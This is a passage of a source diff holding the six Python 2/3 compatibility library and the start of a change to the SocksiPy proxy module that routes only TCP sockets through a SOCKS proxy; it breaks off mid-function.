runs on Python 2 and 3""" + +from __future__ import absolute_import + +import functools +import itertools +import operator +import sys +import types + +__author__ = "Benjamin Peterson " +__version__ = "1.17.0" + + +# Useful for very coarse version differentiation. +PY2 = sys.version_info[0] == 2 +PY3 = sys.version_info[0] == 3 +PY34 = sys.version_info[0:2] >= (3, 4) + +if PY3: + string_types = str, + integer_types = int, + class_types = type, + text_type = str + binary_type = bytes + + MAXSIZE = sys.maxsize +else: + string_types = basestring, + integer_types = (int, long) + class_types = (type, types.ClassType) + text_type = unicode + binary_type = str + + if sys.platform.startswith("java"): + # Jython always uses 32 bits. + MAXSIZE = int((1 << 31) - 1) + else: + # It's possible to have sizeof(long) != sizeof(Py_ssize_t). 
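# A brief sketch of how the compatibility aliases defined above are typically used,
# assuming this package is importable as six; the to_text() helper is illustrative
# only and is not part of six itself.
import six

def to_text(value, encoding="utf-8"):
    # Normalise bytes or text into the text type of the running interpreter.
    if isinstance(value, six.binary_type):
        return value.decode(encoding)
    if isinstance(value, six.string_types):
        return value
    return six.text_type(value)

assert to_text(b"abc") == to_text(u"abc")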
+ class X(object): + + def __len__(self): + return 1 << 31 + try: + len(X()) + except OverflowError: + # 32-bit + MAXSIZE = int((1 << 31) - 1) + else: + # 64-bit + MAXSIZE = int((1 << 63) - 1) + del X + +if PY34: + from importlib.util import spec_from_loader +else: + spec_from_loader = None + + +def _add_doc(func, doc): + """Add documentation to a function.""" + func.__doc__ = doc + + +def _import_module(name): + """Import module, returning the module after the last dot.""" + __import__(name) + return sys.modules[name] + + +class _LazyDescr(object): + + def __init__(self, name): + self.name = name + + def __get__(self, obj, tp): + result = self._resolve() + setattr(obj, self.name, result) # Invokes __set__. + try: + # This is a bit ugly, but it avoids running this again by + # removing this descriptor. + delattr(obj.__class__, self.name) + except AttributeError: + pass + return result + + +class MovedModule(_LazyDescr): + + def __init__(self, name, old, new=None): + super(MovedModule, self).__init__(name) + if PY3: + if new is None: + new = name + self.mod = new + else: + self.mod = old + + def _resolve(self): + return _import_module(self.mod) + + def __getattr__(self, attr): + _module = self._resolve() + value = getattr(_module, attr) + setattr(self, attr, value) + return value + + +class _LazyModule(types.ModuleType): + + def __init__(self, name): + super(_LazyModule, self).__init__(name) + self.__doc__ = self.__class__.__doc__ + + def __dir__(self): + attrs = ["__doc__", "__name__"] + attrs += [attr.name for attr in self._moved_attributes] + return attrs + + # Subclasses should override this + _moved_attributes = [] + + +class MovedAttribute(_LazyDescr): + + def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None): + super(MovedAttribute, self).__init__(name) + if PY3: + if new_mod is None: + new_mod = name + self.mod = new_mod + if new_attr is None: + if old_attr is None: + new_attr = name + else: + new_attr = old_attr + self.attr = new_attr + else: + self.mod = old_mod + if old_attr is None: + old_attr = name + self.attr = old_attr + + def _resolve(self): + module = _import_module(self.mod) + return getattr(module, self.attr) + + +class _SixMetaPathImporter(object): + + """ + A meta path importer to import six.moves and its submodules. + + This class implements a PEP302 finder and loader. It should be compatible + with Python 2.5 and all existing versions of Python3 + """ + + def __init__(self, six_module_name): + self.name = six_module_name + self.known_modules = {} + + def _add_module(self, mod, *fullnames): + for fullname in fullnames: + self.known_modules[self.name + "." + fullname] = mod + + def _get_module(self, fullname): + return self.known_modules[self.name + "." 
+ fullname] + + def find_module(self, fullname, path=None): + if fullname in self.known_modules: + return self + return None + + def find_spec(self, fullname, path, target=None): + if fullname in self.known_modules: + return spec_from_loader(fullname, self) + return None + + def __get_module(self, fullname): + try: + return self.known_modules[fullname] + except KeyError: + raise ImportError("This loader does not know module " + fullname) + + def load_module(self, fullname): + try: + # in case of a reload + return sys.modules[fullname] + except KeyError: + pass + mod = self.__get_module(fullname) + if isinstance(mod, MovedModule): + mod = mod._resolve() + else: + mod.__loader__ = self + sys.modules[fullname] = mod + return mod + + def is_package(self, fullname): + """ + Return true, if the named module is a package. + + We need this method to get correct spec objects with + Python 3.4 (see PEP451) + """ + return hasattr(self.__get_module(fullname), "__path__") + + def get_code(self, fullname): + """Return None + + Required, if is_package is implemented""" + self.__get_module(fullname) # eventually raises ImportError + return None + get_source = get_code # same as get_code + + def create_module(self, spec): + return self.load_module(spec.name) + + def exec_module(self, module): + pass + +_importer = _SixMetaPathImporter(__name__) + + +class _MovedItems(_LazyModule): + + """Lazy loading of moved objects""" + __path__ = [] # mark as package + + +_moved_attributes = [ + MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"), + MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"), + MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"), + MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"), + MovedAttribute("intern", "__builtin__", "sys"), + MovedAttribute("map", "itertools", "builtins", "imap", "map"), + MovedAttribute("getcwd", "os", "os", "getcwdu", "getcwd"), + MovedAttribute("getcwdb", "os", "os", "getcwd", "getcwdb"), + MovedAttribute("getoutput", "commands", "subprocess"), + MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"), + MovedAttribute("reload_module", "__builtin__", "importlib" if PY34 else "imp", "reload"), + MovedAttribute("reduce", "__builtin__", "functools"), + MovedAttribute("shlex_quote", "pipes", "shlex", "quote"), + MovedAttribute("StringIO", "StringIO", "io"), + MovedAttribute("UserDict", "UserDict", "collections", "IterableUserDict", "UserDict"), + MovedAttribute("UserList", "UserList", "collections"), + MovedAttribute("UserString", "UserString", "collections"), + MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"), + MovedAttribute("zip", "itertools", "builtins", "izip", "zip"), + MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"), + MovedModule("builtins", "__builtin__"), + MovedModule("configparser", "ConfigParser"), + MovedModule("collections_abc", "collections", "collections.abc" if sys.version_info >= (3, 3) else "collections"), + MovedModule("copyreg", "copy_reg"), + MovedModule("dbm_gnu", "gdbm", "dbm.gnu"), + MovedModule("dbm_ndbm", "dbm", "dbm.ndbm"), + MovedModule("_dummy_thread", "dummy_thread", "_dummy_thread" if sys.version_info < (3, 9) else "_thread"), + MovedModule("http_cookiejar", "cookielib", "http.cookiejar"), + MovedModule("http_cookies", "Cookie", "http.cookies"), + MovedModule("html_entities", "htmlentitydefs", "html.entities"), + MovedModule("html_parser", "HTMLParser", "html.parser"), + 
MovedModule("http_client", "httplib", "http.client"), + MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"), + MovedModule("email_mime_image", "email.MIMEImage", "email.mime.image"), + MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"), + MovedModule("email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart"), + MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"), + MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"), + MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"), + MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"), + MovedModule("cPickle", "cPickle", "pickle"), + MovedModule("queue", "Queue"), + MovedModule("reprlib", "repr"), + MovedModule("socketserver", "SocketServer"), + MovedModule("_thread", "thread", "_thread"), + MovedModule("tkinter", "Tkinter"), + MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"), + MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"), + MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"), + MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"), + MovedModule("tkinter_tix", "Tix", "tkinter.tix"), + MovedModule("tkinter_ttk", "ttk", "tkinter.ttk"), + MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"), + MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"), + MovedModule("tkinter_colorchooser", "tkColorChooser", + "tkinter.colorchooser"), + MovedModule("tkinter_commondialog", "tkCommonDialog", + "tkinter.commondialog"), + MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"), + MovedModule("tkinter_font", "tkFont", "tkinter.font"), + MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"), + MovedModule("tkinter_tksimpledialog", "tkSimpleDialog", + "tkinter.simpledialog"), + MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"), + MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"), + MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"), + MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"), + MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"), + MovedModule("xmlrpc_server", "SimpleXMLRPCServer", "xmlrpc.server"), +] +# Add windows specific modules. +if sys.platform == "win32": + _moved_attributes += [ + MovedModule("winreg", "_winreg"), + ] + +for attr in _moved_attributes: + setattr(_MovedItems, attr.name, attr) + if isinstance(attr, MovedModule): + _importer._add_module(attr, "moves." 
+ attr.name) +del attr + +_MovedItems._moved_attributes = _moved_attributes + +moves = _MovedItems(__name__ + ".moves") +_importer._add_module(moves, "moves") + + +class Module_six_moves_urllib_parse(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_parse""" + + +_urllib_parse_moved_attributes = [ + MovedAttribute("ParseResult", "urlparse", "urllib.parse"), + MovedAttribute("SplitResult", "urlparse", "urllib.parse"), + MovedAttribute("parse_qs", "urlparse", "urllib.parse"), + MovedAttribute("parse_qsl", "urlparse", "urllib.parse"), + MovedAttribute("urldefrag", "urlparse", "urllib.parse"), + MovedAttribute("urljoin", "urlparse", "urllib.parse"), + MovedAttribute("urlparse", "urlparse", "urllib.parse"), + MovedAttribute("urlsplit", "urlparse", "urllib.parse"), + MovedAttribute("urlunparse", "urlparse", "urllib.parse"), + MovedAttribute("urlunsplit", "urlparse", "urllib.parse"), + MovedAttribute("quote", "urllib", "urllib.parse"), + MovedAttribute("quote_plus", "urllib", "urllib.parse"), + MovedAttribute("unquote", "urllib", "urllib.parse"), + MovedAttribute("unquote_plus", "urllib", "urllib.parse"), + MovedAttribute("unquote_to_bytes", "urllib", "urllib.parse", "unquote", "unquote_to_bytes"), + MovedAttribute("urlencode", "urllib", "urllib.parse"), + MovedAttribute("splitquery", "urllib", "urllib.parse"), + MovedAttribute("splittag", "urllib", "urllib.parse"), + MovedAttribute("splituser", "urllib", "urllib.parse"), + MovedAttribute("splitvalue", "urllib", "urllib.parse"), + MovedAttribute("uses_fragment", "urlparse", "urllib.parse"), + MovedAttribute("uses_netloc", "urlparse", "urllib.parse"), + MovedAttribute("uses_params", "urlparse", "urllib.parse"), + MovedAttribute("uses_query", "urlparse", "urllib.parse"), + MovedAttribute("uses_relative", "urlparse", "urllib.parse"), +] +for attr in _urllib_parse_moved_attributes: + setattr(Module_six_moves_urllib_parse, attr.name, attr) +del attr + +Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes + +_importer._add_module(Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"), + "moves.urllib_parse", "moves.urllib.parse") + + +class Module_six_moves_urllib_error(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_error""" + + +_urllib_error_moved_attributes = [ + MovedAttribute("URLError", "urllib2", "urllib.error"), + MovedAttribute("HTTPError", "urllib2", "urllib.error"), + MovedAttribute("ContentTooShortError", "urllib", "urllib.error"), +] +for attr in _urllib_error_moved_attributes: + setattr(Module_six_moves_urllib_error, attr.name, attr) +del attr + +Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes + +_importer._add_module(Module_six_moves_urllib_error(__name__ + ".moves.urllib.error"), + "moves.urllib_error", "moves.urllib.error") + + +class Module_six_moves_urllib_request(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_request""" + + +_urllib_request_moved_attributes = [ + MovedAttribute("urlopen", "urllib2", "urllib.request"), + MovedAttribute("install_opener", "urllib2", "urllib.request"), + MovedAttribute("build_opener", "urllib2", "urllib.request"), + MovedAttribute("pathname2url", "urllib", "urllib.request"), + MovedAttribute("url2pathname", "urllib", "urllib.request"), + MovedAttribute("getproxies", "urllib", "urllib.request"), + MovedAttribute("Request", "urllib2", "urllib.request"), + MovedAttribute("OpenerDirector", "urllib2", "urllib.request"), + MovedAttribute("HTTPDefaultErrorHandler", 
"urllib2", "urllib.request"), + MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"), + MovedAttribute("ProxyHandler", "urllib2", "urllib.request"), + MovedAttribute("BaseHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"), + MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"), + MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"), + MovedAttribute("FileHandler", "urllib2", "urllib.request"), + MovedAttribute("FTPHandler", "urllib2", "urllib.request"), + MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"), + MovedAttribute("UnknownHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"), + MovedAttribute("urlretrieve", "urllib", "urllib.request"), + MovedAttribute("urlcleanup", "urllib", "urllib.request"), + MovedAttribute("proxy_bypass", "urllib", "urllib.request"), + MovedAttribute("parse_http_list", "urllib2", "urllib.request"), + MovedAttribute("parse_keqv_list", "urllib2", "urllib.request"), +] +if sys.version_info[:2] < (3, 14): + _urllib_request_moved_attributes.extend( + [ + MovedAttribute("URLopener", "urllib", "urllib.request"), + MovedAttribute("FancyURLopener", "urllib", "urllib.request"), + ] + ) +for attr in _urllib_request_moved_attributes: + setattr(Module_six_moves_urllib_request, attr.name, attr) +del attr + +Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes + +_importer._add_module(Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"), + "moves.urllib_request", "moves.urllib.request") + + +class Module_six_moves_urllib_response(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_response""" + + +_urllib_response_moved_attributes = [ + MovedAttribute("addbase", "urllib", "urllib.response"), + MovedAttribute("addclosehook", "urllib", "urllib.response"), + MovedAttribute("addinfo", "urllib", "urllib.response"), + MovedAttribute("addinfourl", "urllib", "urllib.response"), +] +for attr in _urllib_response_moved_attributes: + setattr(Module_six_moves_urllib_response, attr.name, attr) +del attr + +Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes + +_importer._add_module(Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"), + "moves.urllib_response", "moves.urllib.response") + + +class Module_six_moves_urllib_robotparser(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_robotparser""" + + +_urllib_robotparser_moved_attributes = [ + MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"), +] +for attr in _urllib_robotparser_moved_attributes: + setattr(Module_six_moves_urllib_robotparser, attr.name, attr) +del attr + +Module_six_moves_urllib_robotparser._moved_attributes = _urllib_robotparser_moved_attributes + +_importer._add_module(Module_six_moves_urllib_robotparser(__name__ + 
".moves.urllib.robotparser"), + "moves.urllib_robotparser", "moves.urllib.robotparser") + + +class Module_six_moves_urllib(types.ModuleType): + + """Create a six.moves.urllib namespace that resembles the Python 3 namespace""" + __path__ = [] # mark as package + parse = _importer._get_module("moves.urllib_parse") + error = _importer._get_module("moves.urllib_error") + request = _importer._get_module("moves.urllib_request") + response = _importer._get_module("moves.urllib_response") + robotparser = _importer._get_module("moves.urllib_robotparser") + + def __dir__(self): + return ['parse', 'error', 'request', 'response', 'robotparser'] + +_importer._add_module(Module_six_moves_urllib(__name__ + ".moves.urllib"), + "moves.urllib") + + +def add_move(move): + """Add an item to six.moves.""" + setattr(_MovedItems, move.name, move) + + +def remove_move(name): + """Remove item from six.moves.""" + try: + delattr(_MovedItems, name) + except AttributeError: + try: + del moves.__dict__[name] + except KeyError: + raise AttributeError("no such move, %r" % (name,)) + + +if PY3: + _meth_func = "__func__" + _meth_self = "__self__" + + _func_closure = "__closure__" + _func_code = "__code__" + _func_defaults = "__defaults__" + _func_globals = "__globals__" +else: + _meth_func = "im_func" + _meth_self = "im_self" + + _func_closure = "func_closure" + _func_code = "func_code" + _func_defaults = "func_defaults" + _func_globals = "func_globals" + + +try: + advance_iterator = next +except NameError: + def advance_iterator(it): + return it.next() +next = advance_iterator + + +try: + callable = callable +except NameError: + def callable(obj): + return any("__call__" in klass.__dict__ for klass in type(obj).__mro__) + + +if PY3: + def get_unbound_function(unbound): + return unbound + + create_bound_method = types.MethodType + + def create_unbound_method(func, cls): + return func + + Iterator = object +else: + def get_unbound_function(unbound): + return unbound.im_func + + def create_bound_method(func, obj): + return types.MethodType(func, obj, obj.__class__) + + def create_unbound_method(func, cls): + return types.MethodType(func, None, cls) + + class Iterator(object): + + def next(self): + return type(self).__next__(self) + + callable = callable +_add_doc(get_unbound_function, + """Get the function out of a possibly unbound function""") + + +get_method_function = operator.attrgetter(_meth_func) +get_method_self = operator.attrgetter(_meth_self) +get_function_closure = operator.attrgetter(_func_closure) +get_function_code = operator.attrgetter(_func_code) +get_function_defaults = operator.attrgetter(_func_defaults) +get_function_globals = operator.attrgetter(_func_globals) + + +if PY3: + def iterkeys(d, **kw): + return iter(d.keys(**kw)) + + def itervalues(d, **kw): + return iter(d.values(**kw)) + + def iteritems(d, **kw): + return iter(d.items(**kw)) + + def iterlists(d, **kw): + return iter(d.lists(**kw)) + + viewkeys = operator.methodcaller("keys") + + viewvalues = operator.methodcaller("values") + + viewitems = operator.methodcaller("items") +else: + def iterkeys(d, **kw): + return d.iterkeys(**kw) + + def itervalues(d, **kw): + return d.itervalues(**kw) + + def iteritems(d, **kw): + return d.iteritems(**kw) + + def iterlists(d, **kw): + return d.iterlists(**kw) + + viewkeys = operator.methodcaller("viewkeys") + + viewvalues = operator.methodcaller("viewvalues") + + viewitems = operator.methodcaller("viewitems") + +_add_doc(iterkeys, "Return an iterator over the keys of a dictionary.") +_add_doc(itervalues, 
"Return an iterator over the values of a dictionary.") +_add_doc(iteritems, + "Return an iterator over the (key, value) pairs of a dictionary.") +_add_doc(iterlists, + "Return an iterator over the (key, [values]) pairs of a dictionary.") + + +if PY3: + def b(s): + return s.encode("latin-1") + + def u(s): + return s + unichr = chr + import struct + int2byte = struct.Struct(">B").pack + del struct + byte2int = operator.itemgetter(0) + indexbytes = operator.getitem + iterbytes = iter + import io + StringIO = io.StringIO + BytesIO = io.BytesIO + del io + _assertCountEqual = "assertCountEqual" + if sys.version_info[1] <= 1: + _assertRaisesRegex = "assertRaisesRegexp" + _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" + else: + _assertRaisesRegex = "assertRaisesRegex" + _assertRegex = "assertRegex" + _assertNotRegex = "assertNotRegex" +else: + def b(s): + return s + # Workaround for standalone backslash + + def u(s): + return unicode(s.replace(r'\\', r'\\\\'), "unicode_escape") + unichr = unichr + int2byte = chr + + def byte2int(bs): + return ord(bs[0]) + + def indexbytes(buf, i): + return ord(buf[i]) + iterbytes = functools.partial(itertools.imap, ord) + import StringIO + StringIO = BytesIO = StringIO.StringIO + _assertCountEqual = "assertItemsEqual" + _assertRaisesRegex = "assertRaisesRegexp" + _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" +_add_doc(b, """Byte literal""") +_add_doc(u, """Text literal""") + + +def assertCountEqual(self, *args, **kwargs): + return getattr(self, _assertCountEqual)(*args, **kwargs) + + +def assertRaisesRegex(self, *args, **kwargs): + return getattr(self, _assertRaisesRegex)(*args, **kwargs) + + +def assertRegex(self, *args, **kwargs): + return getattr(self, _assertRegex)(*args, **kwargs) + + +def assertNotRegex(self, *args, **kwargs): + return getattr(self, _assertNotRegex)(*args, **kwargs) + + +if PY3: + exec_ = getattr(moves.builtins, "exec") + + def reraise(tp, value, tb=None): + try: + if value is None: + value = tp() + if value.__traceback__ is not tb: + raise value.with_traceback(tb) + raise value + finally: + value = None + tb = None + +else: + def exec_(_code_, _globs_=None, _locs_=None): + """Execute code in a namespace.""" + if _globs_ is None: + frame = sys._getframe(1) + _globs_ = frame.f_globals + if _locs_ is None: + _locs_ = frame.f_locals + del frame + elif _locs_ is None: + _locs_ = _globs_ + exec("""exec _code_ in _globs_, _locs_""") + + exec_("""def reraise(tp, value, tb=None): + try: + raise tp, value, tb + finally: + tb = None +""") + + +if sys.version_info[:2] > (3,): + exec_("""def raise_from(value, from_value): + try: + raise value from from_value + finally: + value = None +""") +else: + def raise_from(value, from_value): + raise value + + +print_ = getattr(moves.builtins, "print", None) +if print_ is None: + def print_(*args, **kwargs): + """The new-style print function for Python 2.4 and 2.5.""" + fp = kwargs.pop("file", sys.stdout) + if fp is None: + return + + def write(data): + if not isinstance(data, basestring): + data = str(data) + # If the file has an encoding, encode unicode with it. 
+ if (isinstance(fp, file) and + isinstance(data, unicode) and + fp.encoding is not None): + errors = getattr(fp, "errors", None) + if errors is None: + errors = "strict" + data = data.encode(fp.encoding, errors) + fp.write(data) + want_unicode = False + sep = kwargs.pop("sep", None) + if sep is not None: + if isinstance(sep, unicode): + want_unicode = True + elif not isinstance(sep, str): + raise TypeError("sep must be None or a string") + end = kwargs.pop("end", None) + if end is not None: + if isinstance(end, unicode): + want_unicode = True + elif not isinstance(end, str): + raise TypeError("end must be None or a string") + if kwargs: + raise TypeError("invalid keyword arguments to print()") + if not want_unicode: + for arg in args: + if isinstance(arg, unicode): + want_unicode = True + break + if want_unicode: + newline = unicode("\n") + space = unicode(" ") + else: + newline = "\n" + space = " " + if sep is None: + sep = space + if end is None: + end = newline + for i, arg in enumerate(args): + if i: + write(sep) + write(arg) + write(end) +if sys.version_info[:2] < (3, 3): + _print = print_ + + def print_(*args, **kwargs): + fp = kwargs.get("file", sys.stdout) + flush = kwargs.pop("flush", False) + _print(*args, **kwargs) + if flush and fp is not None: + fp.flush() + +_add_doc(reraise, """Reraise an exception.""") + +if sys.version_info[0:2] < (3, 4): + # This does exactly the same what the :func:`py3:functools.update_wrapper` + # function does on Python versions after 3.2. It sets the ``__wrapped__`` + # attribute on ``wrapper`` object and it doesn't raise an error if any of + # the attributes mentioned in ``assigned`` and ``updated`` are missing on + # ``wrapped`` object. + def _update_wrapper(wrapper, wrapped, + assigned=functools.WRAPPER_ASSIGNMENTS, + updated=functools.WRAPPER_UPDATES): + for attr in assigned: + try: + value = getattr(wrapped, attr) + except AttributeError: + continue + else: + setattr(wrapper, attr, value) + for attr in updated: + getattr(wrapper, attr).update(getattr(wrapped, attr, {})) + wrapper.__wrapped__ = wrapped + return wrapper + _update_wrapper.__doc__ = functools.update_wrapper.__doc__ + + def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS, + updated=functools.WRAPPER_UPDATES): + return functools.partial(_update_wrapper, wrapped=wrapped, + assigned=assigned, updated=updated) + wraps.__doc__ = functools.wraps.__doc__ + +else: + wraps = functools.wraps + + +def with_metaclass(meta, *bases): + """Create a base class with a metaclass.""" + # This requires a bit of explanation: the basic idea is to make a dummy + # metaclass for one level of class instantiation that replaces itself with + # the actual metaclass. + class metaclass(type): + + def __new__(cls, name, this_bases, d): + if sys.version_info[:2] >= (3, 7): + # This version introduced PEP 560 that requires a bit + # of extra care (we mimic what is done by __build_class__). 
+ resolved_bases = types.resolve_bases(bases) + if resolved_bases is not bases: + d['__orig_bases__'] = bases + else: + resolved_bases = bases + return meta(name, resolved_bases, d) + + @classmethod + def __prepare__(cls, name, this_bases): + return meta.__prepare__(name, bases) + return type.__new__(metaclass, 'temporary_class', (), {}) + + +def add_metaclass(metaclass): + """Class decorator for creating a class with a metaclass.""" + def wrapper(cls): + orig_vars = cls.__dict__.copy() + slots = orig_vars.get('__slots__') + if slots is not None: + if isinstance(slots, str): + slots = [slots] + for slots_var in slots: + orig_vars.pop(slots_var) + orig_vars.pop('__dict__', None) + orig_vars.pop('__weakref__', None) + if hasattr(cls, '__qualname__'): + orig_vars['__qualname__'] = cls.__qualname__ + return metaclass(cls.__name__, cls.__bases__, orig_vars) + return wrapper + + +def ensure_binary(s, encoding='utf-8', errors='strict'): + """Coerce **s** to six.binary_type. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> encoded to `bytes` + - `bytes` -> `bytes` + """ + if isinstance(s, binary_type): + return s + if isinstance(s, text_type): + return s.encode(encoding, errors) + raise TypeError("not expecting type '%s'" % type(s)) + + +def ensure_str(s, encoding='utf-8', errors='strict'): + """Coerce *s* to `str`. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + # Optimization: Fast return for the common case. + if type(s) is str: + return s + if PY2 and isinstance(s, text_type): + return s.encode(encoding, errors) + elif PY3 and isinstance(s, binary_type): + return s.decode(encoding, errors) + elif not isinstance(s, (text_type, binary_type)): + raise TypeError("not expecting type '%s'" % type(s)) + return s + + +def ensure_text(s, encoding='utf-8', errors='strict'): + """Coerce *s* to six.text_type. + + For Python 2: + - `unicode` -> `unicode` + - `str` -> `unicode` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + if isinstance(s, binary_type): + return s.decode(encoding, errors) + elif isinstance(s, text_type): + return s + else: + raise TypeError("not expecting type '%s'" % type(s)) + + +def python_2_unicode_compatible(klass): + """ + A class decorator that defines __unicode__ and __str__ methods under Python 2. + Under Python 3 it does nothing. + + To support Python 2 and 3 with a single code base, define a __str__ method + returning text and apply this decorator to the class. + """ + if PY2: + if '__str__' not in klass.__dict__: + raise ValueError("@python_2_unicode_compatible cannot be applied " + "to %s because it doesn't define __str__()." % + klass.__name__) + klass.__unicode__ = klass.__str__ + klass.__str__ = lambda self: self.__unicode__().encode('utf-8') + return klass + + +# Complete the moves implementation. +# This code is at the end of this module to speed up module loading. +# Turn this module into a package. +__path__ = [] # required for PEP 302 and PEP 451 +__package__ = __name__ # see PEP 366 @ReservedAssignment +if globals().get("__spec__") is not None: + __spec__.submodule_search_locations = [] # PEP 451 @UndefinedVariable +# Remove other six meta path importers, since they cause problems. This can +# happen if six is removed from sys.modules and then reloaded. (Setuptools does +# this for some reason.) 
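# Illustrative sketch, not part of the patch above: the ensure_binary()/ensure_str()/
# ensure_text() helpers defined in this hunk give a single spelling for byte/text
# coercion on both Python 2 and Python 3. The "thirdparty.six" import path is an
# assumption about how the vendored copy is exposed; adjust it to the local layout.
from thirdparty import six

assert six.ensure_binary("SELECT 1") == b"SELECT 1"    # text -> bytes (UTF-8 by default)
assert six.ensure_text(b"admin") == u"admin"           # bytes -> text
assert isinstance(six.ensure_str(b"payload"), str)     # always the interpreter's native str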
+if sys.meta_path: + for i, importer in enumerate(sys.meta_path): + # Here's some real nastiness: Another "instance" of the six module might + # be floating around. Therefore, we can't use isinstance() to check for + # the six meta path importer, since the other six instance will have + # inserted an importer with different class. + if (type(importer).__name__ == "_SixMetaPathImporter" and + importer.name == __name__): + del sys.meta_path[i] + break + del i, importer +# Finally, add the importer to the meta path import hook. +sys.meta_path.append(_importer) diff --git a/thirdparty/socks/socks.py b/thirdparty/socks/socks.py index e164ced407d..065f90e0869 100644 --- a/thirdparty/socks/socks.py +++ b/thirdparty/socks/socks.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """SocksiPy - Python SOCKS module. -Version 1.00 +Version 1.01 Copyright 2006 Dan-Haim. All rights reserved. @@ -33,7 +33,7 @@ """ """ -Minor modifications made by Miroslav Stampar (http://sqlmap.org/) +Minor modifications made by Miroslav Stampar (https://sqlmap.org) for patching DNS-leakage occuring in socket.create_connection() Minor modifications made by Christopher Gilbert (http://motomastyle.com/) @@ -44,6 +44,7 @@ """ +import functools import socket import struct @@ -52,7 +53,8 @@ PROXY_TYPE_HTTP = 3 _defaultproxy = None -_orgsocket = socket.socket +socket._orig_socket = _orgsocket = _orig_socket = socket.socket +_orgcreateconnection = socket.create_connection class ProxyError(Exception): pass class GeneralProxyError(ProxyError): pass @@ -106,15 +108,40 @@ def wrapmodule(module): This will only work on modules that import socket directly into the namespace; most of the Python Standard Library falls into this category. """ - if _defaultproxy != None: - module.socket.socket = socksocket - module.socket.create_connection = create_connection + if _defaultproxy is not None: + _orig_socket_ctor = _orgsocket + + @functools.wraps(_orig_socket_ctor) + def guarded_socket(*args, **kwargs): + # socket.socket([family[, type[, proto]]]) + family = args[0] if len(args) > 0 else kwargs.get("family", socket.AF_INET) + stype = args[1] if len(args) > 1 else kwargs.get("type", socket.SOCK_STREAM) + + # Normalize socket type by stripping flags (Py3.3+ may OR these in) + flags = 0 + flags |= getattr(socket, "SOCK_CLOEXEC", 0) + flags |= getattr(socket, "SOCK_NONBLOCK", 0) + base_type = stype & ~flags + + if family in (socket.AF_INET, getattr(socket, "AF_INET6", socket.AF_INET)) and base_type == socket.SOCK_STREAM: + return socksocket(*args, **kwargs) + + # Fallback: don't proxy AF_UNIX / raw / etc. 
